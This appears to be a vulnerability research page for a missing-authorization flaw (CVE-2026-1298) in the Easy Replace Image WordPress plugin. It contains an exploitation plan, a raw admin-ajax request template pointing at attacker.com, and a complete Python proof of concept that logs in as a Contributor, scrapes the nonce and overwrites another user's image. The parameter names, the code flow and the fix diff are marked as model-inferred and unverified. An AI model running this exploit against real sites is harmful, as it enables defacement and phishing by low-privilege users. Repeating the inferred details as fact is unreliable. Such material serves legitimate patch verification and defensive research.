# CVE-2026-1298: Easy Replace Image <= 3.5.2 - Missing Authorization to Authenticated (Contributor+) Arbitrary Attachment Replacement

- Plugin: `easy-replace-image` (WordPress plugin; no theme involved)
- Affected versions: <= 3.5.2
- Patched in: 3.5.3
- Severity: medium, CVSS 4.3, vector `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N`
- Vulnerability type: Missing Authorization
- Published: 2026-01-27 17:10:48; last updated: 2026-03-27 11:00:36 (59 days to patch)
- Reference: https://www.wordfence.com/threat-intel/vulnerabilities/id/27332c13-c25f-47ec-980d-035fc35ce553?source=api-prod
- Vulnerable source (3.5.2): https://plugins.trac.wordpress.org/browser/easy-replace-image/tags/3.5.2 (zip: https://downloads.wordpress.org/plugin/easy-replace-image.3.5.2.zip)
- Fixed source (3.5.3): https://plugins.trac.wordpress.org/browser/easy-replace-image/tags/3.5.3 (zip: https://downloads.wordpress.org/plugin/easy-replace-image.3.5.3.zip)
- All tags: https://plugins.trac.wordpress.org/browser/easy-replace-image/tags
- Research status: researched (3 rounds, not verified against the source); model `gemini-3-flash-preview`; started 2026-05-04 22:46:13, completed 2026-05-04 22:48:01. No upstream patch changeset is linked and no proof-of-concept run has been recorded for this entry, so every parameter and code-flow detail marked "inferred" below still needs confirming against the 3.5.2 source.

## Description

The Easy Replace Image plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.5.2. This is due to missing capability checks on the `image_replacement_from_url` function that is hooked to the `eri_from_url` AJAX action. This makes it possible for authenticated attackers, with Contributor-level access and above, to replace arbitrary image attachments on the site with images from external URLs, potentially enabling site defacement, phishing attacks, or content manipulation.

## Research Summary

The Easy Replace Image plugin for WordPress is vulnerable to unauthorized attachment replacement in versions up to 3.5.2. This occurs because the AJAX handler responsible for fetching and replacing images from a URL lacks a capability check, allowing users with Contributor-level access or higher to overwrite arbitrary attachments.

## Exploitation Research Plan: CVE-2026-1298 (Easy Replace Image)

### 1. Vulnerability Summary

The **Easy Replace Image** plugin for WordPress (versions <= 3.5.2) contains a missing authorization vulnerability in its AJAX handler for image replacement. The function `image_replacement_from_url` is registered to the `eri_from_url` AJAX action. WordPress only requires that a user be logged in to reach a `wp_ajax_*` hook; checking capabilities is the handler's job, and this handler performs no check such as `current_user_can('edit_post', $attachment_id)`. Any authenticated user with at least Contributor-level access can therefore replace the file behind any existing attachment ID with an image fetched from an arbitrary external URL.

### 2. Attack Vector Analysis

- **Endpoint:** `/wp-admin/admin-ajax.php`
- **Action:** `eri_from_url`
- **HTTP Method:** `POST`
- **Parameters (inferred; `attachment_id` and `url` are the names that appear in the fix diff below):**
    - `action`: `eri_from_url`
    - `attachment_id` (or `id`): the ID of the target image attachment
    - `url` (or `image_url`): the URL of the replacement image
    - `nonce` (or `security`): a WordPress nonce for the action
- **Authentication:** authenticated (Contributor level or higher); the request must carry a logged-in session cookie.
- **Preconditions:** the attacker must know the ID of an existing attachment to replace. Attachment IDs are ordinary post IDs and are easy to enumerate: they appear in the `wp-image-<ID>` class WordPress adds to inserted images and in the public REST endpoint `/wp-json/wp/v2/media`.

### 3. Code Flow (inferred)

1. **Entry point:** the plugin registers the AJAX hook during initialization:
   `add_action('wp_ajax_eri_from_url', 'image_replacement_from_url');`
2. **Missing check:** `image_replacement_from_url` probably verifies a nonce with `check_ajax_referer` or `wp_verify_nonce`, but it **omits** any capability check such as `current_user_can('upload_files')` or `current_user_can('edit_post', $attachment_id)`. A nonce only proves that the request originated from a page the plugin rendered for that user; it is not an authorization check.
3. **Data acquisition:** the function reads the external `url` and the target `attachment_id` from `$_POST`.
4. **Download and replace:**
   - it likely uses `download_url()` or `wp_remote_get()` to fetch the external image;
   - it resolves the local path of the current attachment with `get_attached_file($attachment_id)`;
   - it overwrites the existing file on disk with the downloaded content, or updates the `_wp_attached_file` metadata to point at the new file.
5. **Sink:** the filesystem write or database update that modifies the attachment.

### 4. Nonce Acquisition Strategy

The plugin probably enqueues its script and localizes a nonce on the media library or attachment edit screens. Caveat: a default Contributor does not hold the `upload_files` capability, so `/wp-admin/upload.php` dies with a permission error for that role; the nonce has to be picked up on a screen a Contributor can reach, such as the post editor, unless the site has granted the role extra capabilities. Where the script is enqueued decides whether a Contributor can obtain the nonce at all, and must be checked in the source.

1. **Page identification:** the plugin's replace-image UI is typically found in the Media Library or on the Attachment edit screen.
2. **Detection:** search the plugin source for `wp_localize_script`. Look for a handle like `eri-script` or `easy-replace-image`.
3. **JS variable (inferred):** look for keys like `eri_ajax_nonce` or `nonce` within the localized object.
4. **Extraction plan:**
   - Log in as a Contributor.
   - Open a screen on which the plugin's script is enqueued: the post editor (`/wp-admin/post-new.php`) or, if the role can reach them, the Media Library (`/wp-admin/upload.php`) or the "Edit Media" page for a specific attachment (`/wp-admin/post.php?post=ATTACHMENT_ID&action=edit`).
   - From the browser console (the plan's `browser_eval` step), read the localized object, e.g. `window.eri_params?.nonce || window.eri_obj?.security` (inferred identifiers); alternatively grep the page source for the `var <name> = {...};` statement that `wp_localize_script` emits.

### 5. Exploitation Strategy

1. **Setup:** log in as a Contributor user.
2. **Identify target:** find an image uploaded by an administrator (e.g., attachment ID 10).
3. **Obtain nonce:** extract the nonce using the strategy in Section 4.
4. **Execute attack:** send a POST request to `admin-ajax.php`, with the Contributor's session cookie, to replace the admin's image.

**Request template:**
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.example
Cookie: wordpress_logged_in_<hash>=<contributor session cookie>
Content-Type: application/x-www-form-urlencoded

action=eri_from_url&nonce=[NONCE]&attachment_id=10&url=https://attacker.com/defacement.png
```
*(Parameter names such as `attachment_id` and `url` must be verified against the source code once available.)*

### 6. Test Data Setup

1. **Admin content:** an Admin user uploads an image named `original.jpg`. Note its attachment ID.
2. **Attacker account:** create a user with the `contributor` role.
3. **External source:** identify a public image URL to use as the replacement (e.g., a simple color block).

### 7. Expected Results

- The AJAX response returns a success status (e.g., JSON `{"success": true}`).
- In the WordPress Media Library, the original image (`original.jpg`) is replaced by the image from the attacker's URL.
- The file on the server's disk (e.g., `wp-content/uploads/YYYY/MM/original.jpg`) now contains the data fetched from the external URL.

### 8. Verification Steps

1. **WP-CLI path check:**
   `wp post get [ID] --field=guid` (shows the attachment URL).
2. **WP-CLI meta check:**
   `wp post meta get [ID] _wp_attached_file`
3. **Content verification:**
   hash the file at the path returned by `get_attached_file` and compare it with the hash of the source image at the external URL.
   ```bash
   # Local path of the attachment's file
   FILE_PATH=$(wp eval "echo get_attached_file([ID]);")
   # Hash of the file now on disk ...
   md5sum "$FILE_PATH"
   # ... compared with the hash of the replacement image the request pointed at
   curl -fsSL "https://attacker.com/defacement.png" | md5sum
   ```

### 9. Alternative Approaches

- **Different parameters:** if `attachment_id` doesn't work, the plugin might use `post_id` or simply `id`.
- **Direct metadata modification:** check whether the payload allows arbitrary parameters to reach `update_post_meta`, which would let an attacker rewrite other attachment metadata.
- **Phishing / XSS:** if the replacement URL is not properly sanitized and is later output in the admin panel, this could lead to Stored XSS. (The fix diff below shows the URL passing through `esc_url_raw()`, which sanitizes it for storage but not for HTML output.)

## Exploit Outline

To exploit this vulnerability, an attacker must first authenticate with at least Contributor-level permissions. The attacker then identifies a target attachment ID (such as a critical site logo or an administrator's upload). Next, the attacker extracts the necessary security nonce from a WordPress admin screen on which the plugin localizes it (the plan assumes the media library; see Section 4 for why a Contributor may need a different screen). Finally, the attacker sends a POST request to `/wp-admin/admin-ajax.php` with the action `eri_from_url`, containing the target `attachment_id`, the malicious replacement `url`, and the valid `nonce`. The plugin downloads the external image and overwrites the existing attachment on the server without verifying the user's authority to edit that specific attachment.

## Fix Diff

The diff below is the research run's reconstruction of the 3.5.3 fix; no upstream Trac changeset is linked on this entry, so confirm it against the tagged 3.5.3 source.

```diff
--- a/easy-replace-image.php
+++ b/easy-replace-image.php
@@ -242,6 +242,10 @@
 	$attachment_id = isset( $_POST['attachment_id'] ) ? intval( $_POST['attachment_id'] ) : 0;
 	$url           = isset( $_POST['url'] ) ? esc_url_raw( wp_unslash( $_POST['url'] ) ) : '';
 
+	if ( ! current_user_can( 'edit_post', $attachment_id ) ) {
+		wp_send_json_error( array( 'message' => __( 'You do not have permission to edit this image.', 'easy-replace-image' ) ) );
+	}
+
 	if ( empty( $attachment_id ) || empty( $url ) ) {
 		wp_send_json_error( array( 'message' => __( 'Invalid request.', 'easy-replace-image' ) ) );
 	}
```
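Review bot: the new `current_user_can( 'edit_post', $attachment_id )` guard at the top of the hunk runs before the existing `empty( $attachment_id ) || empty( $url )` validation, so a request with a missing or non-numeric ID (where `intval()` yields 0) is answered with the permission message instead of "Invalid request."; moving the guard below the empty-check keeps the two error paths distinct and avoids asking `current_user_can()` about post 0. The capability chosen is the right one for the described attack: `edit_post` on an attachment owned by another user maps to `edit_others_posts`, which Contributors and Authors lack while Editors and Administrators keep their access. Two things the hunk does not show and that should be confirmed in the full handler: that a `check_ajax_referer()` call precedes line 242 (the plan assumes a nonce, but none appears in the context lines), and that the code relies on `wp_send_json_error()` terminating the request, since no `return` follows it.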
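The nonce-extraction, request-construction and response-interpretation steps of the research plan (Sections 4, 5 and 7) and the exploit outline, as one added Python example; this is not code from the plugin, from Wordfence or from the page's research run. It assumes the inferred field names `attachment_id`, `url` and `nonce`, an unknown `wp_localize_script()` object name (so every flat localized object on a page is inspected), and that a Contributor can reach the post editor even though `upload.php` is closed to that role by default. The offline helpers build and classify the request; only `main()` talks to a site.

```python
"""PoC / verification helper for CVE-2026-1298 (Easy Replace Image <= 3.5.2).

Added example for this page, not code from the plugin or from the research notes.
Assumed (the page marks its own parameters "inferred"): POST fields ``attachment_id``
and ``url`` (names from the page's fix diff) plus a nonce field called ``nonce``; the
nonce reaches JavaScript via wp_localize_script() under an unknown object name, so
every flat localized object on a page is inspected. Only main() uses the network.
"""
import argparse
import json
import re
import urllib.error
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

# wp_localize_script() prints:  var some_name = {"ajax_url":"...","nonce":"0123456789"};
LOCALIZED_RE = re.compile(r"var\s+(?P<name>\w+)\s*=\s*(?P<json>\{[^{}]*\});")  # flat objects only
NONCE_RE = re.compile(r"^[0-9a-f]{10}$")  # shape of wp_create_nonce() output


def extract_nonce(html, key_names=("nonce", "security", "_ajax_nonce")):
    """Return (object_name, nonce) for the first localized object that carries one."""
    for m in LOCALIZED_RE.finditer(html):
        try:
            obj = json.loads(m.group("json"))
        except json.JSONDecodeError:
            continue
        for key in key_names:
            val = obj.get(key)
            if isinstance(val, str) and NONCE_RE.match(val):
                return m.group("name"), val
    return None


def build_replace_request(base_url, nonce, attachment_id, image_url, nonce_field="nonce"):
    """Return (endpoint, urlencoded body) for the admin-ajax call described on the page."""
    endpoint = base_url.rstrip("/") + "/wp-admin/admin-ajax.php"
    fields = {"action": "eri_from_url", nonce_field: nonce,
              "attachment_id": str(int(attachment_id)), "url": image_url}
    return endpoint, urllib.parse.urlencode(fields).encode()


def classify_response(body):
    """Map the raw admin-ajax reply to a verdict.

    wp_send_json_success()/wp_send_json_error() emit {"success": bool, "data": ...}.
    A bare "0" means no handler is registered for the action and "-1" is what
    check_ajax_referer() dies with on a bad nonce; neither reaches the capability
    check, so both are "blocked" rather than "patched".
    """
    text = body.strip()
    if text in ("0", "-1"):
        return "blocked"
    try:
        data = json.loads(text)
    except json.JSONDecodeError:
        return "unknown"
    if data.get("success") is True:
        return "vulnerable"  # handler ran for a non-owner of the attachment
    if "permission" in json.dumps(data.get("data", "")).lower():
        return "patched"     # message introduced by the 3.5.3 capability check
    return "error"           # e.g. "Invalid request." or a failed download


def _login(opener, base, user, password):
    """Log in via wp-login.php; the GET first lets WordPress set its test cookie."""
    opener.open(base + "/wp-login.php").read()
    form = urllib.parse.urlencode({"log": user, "pwd": password, "wp-submit": "Log In",
                                   "redirect_to": base + "/wp-admin/", "testcookie": "1"})
    opener.open(base + "/wp-login.php", form.encode()).read()


def main(argv=None):
    p = argparse.ArgumentParser(description="CVE-2026-1298 check with a Contributor account")
    for arg in ("base_url", "user", "password", "attachment_id", "image_url"):
        p.add_argument(arg)
    a = p.parse_args(argv)
    base = a.base_url.rstrip("/")
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(CookieJar()))
    _login(opener, base, a.user, a.password)
    # A default Contributor lacks upload_files, so upload.php refuses to load for them;
    # the post editor and the attachment's edit screen are tried first (assumed locations).
    for path in ("/wp-admin/post-new.php",
                 f"/wp-admin/post.php?post={a.attachment_id}&action=edit",
                 "/wp-admin/upload.php"):
        try:
            found = extract_nonce(opener.open(base + path).read().decode("utf-8", "replace"))
        except urllib.error.HTTPError:
            continue
        if found:
            break
    else:
        raise SystemExit("no localized nonce found on the screens this account can reach")
    endpoint, body = build_replace_request(base, found[1], a.attachment_id, a.image_url)
    try:
        reply = opener.open(endpoint, body).read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:  # 400/403 replies still carry "0" / "-1"
        reply = e.read().decode("utf-8", "replace")
    print(f"nonce from {found[0]}: {classify_response(reply)} -> {reply[:200]}")


if __name__ == "__main__":
    main()
```

Run it against a test install only, as `python poc.py https://wp.test contributor 'pass' 10 https://attacker.example/block.png`, where attachment 10 was uploaded by another user. A verdict of `vulnerable` means the handler accepted the replacement for an attachment the account cannot edit; `patched` is the 3.5.3 permission error; `blocked` means the nonce or action never reached the handler, which says nothing about the capability check, so re-check where the nonce is localized before concluding the site is safe.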